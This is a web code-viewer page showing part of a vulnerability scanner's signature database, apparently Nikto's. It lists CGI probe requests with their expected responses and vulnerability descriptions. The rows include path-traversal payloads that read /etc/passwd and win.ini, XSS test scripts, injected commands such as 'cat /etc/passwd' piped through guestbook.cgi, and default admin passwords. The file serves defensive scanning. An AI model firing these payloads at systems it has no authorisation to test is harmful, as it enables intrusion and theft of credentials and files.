scan_database.db

来自「Ubuntu packages of security software。 相」· DB 代码 · 共 422 行 · 第 1/5 页

DB
422
字号
"generic","@CGIDIRSfinger.cgi","200","GET","finger other users, may be other commands?""generic","@CGIDIRSfinger.pl","200","GET","finger other users, may be other commands?""generic","@CGIDIRSfinger","200","GET","finger other users, may be other commands?""generic","@CGIDIRSflexform.cgi","200","GET","Check Phrack 55 for info by RFP, allows to append info to writable files.""generic","@CGIDIRSflexform","200","GET","Check Phrack 55 for info by RFP, allows to append info to writable files.""generic","@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02.""generic","@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable","<script>alert('Vulnerable')</script>","GET","Faq-O-Matic is vulnerable to cross site scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html""generic","@CGIDIRSFormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com","root:","GET","This CGI allows attackers to read files and execute commands remotely.""generic","@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","root:","GET","This CGI allows attackers to retrieve arbitrary files from the server.""generic","@CGIDIRSFormMail.cgi?<script>alert(\"Vulnerable\");</script>","<script>alert(\"Vulnerable\");</script>","GET","FormMail.cgi allows Cross Site Scripting (XSS). CA-2000-02.""generic","@CGIDIRSformmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","root:","GET","This CGI allows attackers to retrieve arbitrary files from the server.""generic","@CGIDIRSformmail.cgi","Version ","GET","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.""generic","@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","root:","GET","This CGI allows attackers to retrieve arbitrary files from the server.""generic","@CGIDIRSformmail.pl","200","GET","Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.""generic","@CGIDIRSformmail.pl","Version ","GET","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.""generic","@CGIDIRSformmail","Version ","GET","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.""generic","@CGIDIRSfoxweb.dll","200","GET","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.""generic","@CGIDIRSfoxweb.exe","200","GET","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.""generic","@CGIDIRSgbadmin.cgi?action=change_adminpass","200","GET","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 2003 BugTraq post by brainrawt@haxworx.com for details.""generic","@CGIDIRSgbpass.pl","200","GET"," RNN Guestbook 1.2 password storage file. Administrative password should be stored in plaintext. Access gbadmin.cgi in the same directory to (ab)use. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 2003 BugTraq post by brainrawt@haxworx.com for details.""generic","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1","root:","GET","This CGI from SIX webboard allows attackers read arbitrary files on the host.""generic","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","[windows]","GET","This CGI from SIX webboard allows attackers read arbitrary files on the host.""generic","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","[fonts]","GET","This CGI from SIX webboard allows attackers read arbitrary files on the host.""generic","@CGIDIRSget32.exe","200","GET","This can allow attackers to execute arbitrary commands remotely.""generic","@CGIDIRSgettransbitmap","200","GET","Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed, and Answerbook2 should be disabled if not being used.""generic","@CGIDIRSgH.cgi","200","GET","web backdoor by gH""generic","@CGIDIRSgm-authors.cgi","200","GET","GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.""generic","@CGIDIRSgm-cplog.cgi","200","GET","GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.""generic","@CGIDIRSgm.cgi","200","GET","GreyMatter blogger may reveal user ids/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.""generic","@CGIDIRSguestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|","root:","GET","cpanel's guestbook.cgi allows any command to be executed on the remote server. Remove /usr/local/cpanel/cgi-sys/guestbook.cgi or update to a new version of cpanel.""generic","@CGIDIRSguestbook.cgi","200","GET","May allow attackers to execute commands as the web daemon.""generic","@CGIDIRSguestbook.pl","200","GET","May allow attackers to execute commands as the web daemon.""generic","@CGIDIRSguestbook/passwd","200","GET","GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.""generic","@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request","Could not find file SYS","GET","Groupwise allows system information and file retrieval by modifying arguments to the help system.""generic","@CGIDIRSGWWEB.EXE?HELP=bad-request","Could not find file SYS","GET","Groupwise allows system information and file retrieval by modifying arguments to the help system.""generic","@CGIDIRShandler.cgi","200","GET","Variation of Irix Handler? Has been seen from other CGI scanners.""generic","@CGIDIRShorde/test.php?mode=phpinfo","PHP Version","GET","Horde allows phpinfo() to be run, which gives detailed system information.""generic","@CGIDIRShorde/test.php","Horde Versions","GET","Horde script reveals detailed system/Horde information.""generic","@CGIDIRShorde/test.php","IMP: 3.(0|1|2|2\.1)","GET","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.""generic","@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html","200","GET","HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.""generic","@CGIDIRShsx.cgi?show=../../../../../../../../../../../etc/passwd%00","root:","GET","This CGI contains a well known vul that allows attackers to read any system file.""generic","@CGIDIRShtgrep?file=index.html&hdr=/etc/passwd","root:","GET","This CGI contains a well known vul that allows attackers to read any system file.""generic","@CGIDIRShtimage.exe?0,0","200","GET","htimage.exe may be vulnerable to a buffer overflow in the mapname portion. MS00-028. BID-1117""generic","@CGIDIRShtimage.exe/path/filename?0,0","tried the following","GET","htimage.exe can provide physical path of web server. BID-964. BID-1141.""generic","@CGIDIRShtml2chtml.cgi","200","GET","Html2Wml < 0.4.8 access local files via CGI, and more""generic","@CGIDIRShtml2wml.cgi","200","GET","Html2Wml < 0.4.8 access local files via CGI, and more""generic","@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd","root:","GET","This CGI contains a well known vul that allows attackers to read any system file.""generic","@CGIDIRShtsearch?-c/nonexistant","Unable to read configuration file '/nonexistant'","GET","The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself.""generic","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","ht:\/\/Dig","GET","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.""generic","@CGIDIRShtsearch?exclude=%60/etc/passwd%60","root:","GET","This CGI contains a well known vul that allows attackers to read any system file.""generic","@CGIDIRShtsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E","<script>alert('Vulnerable')</script>","GET","htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","@CGIDIRSibill.pm","200","GET","iBill.pm is installed. This may allow brute forcing of passwords.""generic","@CGIDIRSicat","200","GET","Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.""generic","@CGIDIRSImageFolio/admin/admin.cgi","200","GET","ImageFolio (default accout Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/""generic","@CGIDIRSimagemap.exe","200","GET","The version of imagemap.exe installed may contain a buffer overflow. CVE-1999-0951. BID-739. CAN-2000-0122. CAN-2000-0256. MS00-028. BID-1117.""generic","@CGIDIRSimagemap","200","GET","Possible variation: imagemap.exe installed could contain a buffer overflow. BID-1117.""generic","@CGIDIRSinc/sendmail.inc","This program is free software","GET","Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials.""generic","@CGIDIRSinclude/new-visitor.inc.php","200","GET","Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.""generic","@CGIDIRSindex.pl","Powered By WebGUI 4.5.0","GET","WebGUI version 4.5.0 according to the documentation, a user could view collateral data of a wobject if the URL is known. http://freshmeat.net/users/rizen/.""generic","@CGIDIRSindex.pl","Powered By WebGUI 4.6.8","GET","WebGUI version 4.6.8, according to the documentation, may allow arbitray code execution. http://freshmeat.net/users/rizen/.""generic","@CGIDIRSindex.pl","Powered By WebGUI 4.6.9","GET","WebGUI version 4.6.9 has a 'very obsure and unlikely security hole' according to the documentation. http://freshmeat.net/users/rizen/.""generic","@CGIDIRSinfo2www '(../../../../../../../bin/mail root </etc/passwd>","root:","GET","This CGI allows attackers to execute commands. passwd file may have been mailed to root.""generic","@CGIDIRSinfo2www","200","GET","This CGI allows attackers to execute commands.""generic","@CGIDIRSinfosrch.cgi","200","GET","This CGI allows attackers to execute commands.""generic","@CGIDIRSion-p?page=../../../../../etc/passwd","root:","GET","Ion-P allows remote file retrieval.""generic","@CGIDIRSion-p.exe?page=c:\winnt\repair\sam","200","GET","Ion-P allows remote file retrieval.""generic","@CGIDIRSksh","200","GET","Shell found in CGI dir!""generic","@CGIDIRSlastlines.cgi?process","root:","POST","This CGI lets attackers read arbitrary files and/or execute commands.","num_lines=1000&log_location=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd""generic","@CGIDIRSlistrec.pl","200","GET","This CGI allows attackers to execute commands on the host.""generic","@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd","root:","GET","This CGI allows attackers to read arbitrary files on the host.""generic","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","[windows]","GET","This CGI allows attackers to read arbitrary files on the host.""generic","@CGIDIRSlog/nether-log.pl?checkit","200","GET","Default Pass: nethernet-rules""generic","@CGIDIRSlogin.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;","<script>alert('Vulnerable')</script>","GET","BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","@CGIDIRSlwgate.cgi","200","GET","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7""generic","@CGIDIRSLWGate.cgi","200","GET","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7""generic","@CGIDIRSlwgate","200","GET","Check Phrack 55 for info by RFP""generic","@CGIDIRSLWGate","200","GET","Check Phrack 55 for info by RFP""generic","@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","root:","GET","EmuMail allows any file to be retrieved from the remote system.""generic","@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00","root:","GET","MailReader.com v2.3.31 web package allows remote users to retrieve any system file.""generic","@CGIDIRSmailnews.cgi","200","GET","some versions allow attacker to execute commands as http daemon. Upgrade or remove.""generic","@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd","root:","GET","This CGI allows attackers to read arbitrary files remotely.""generic","@CGIDIRSmgrqcgi","200","GET","This CGI from Magic Enterpr

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?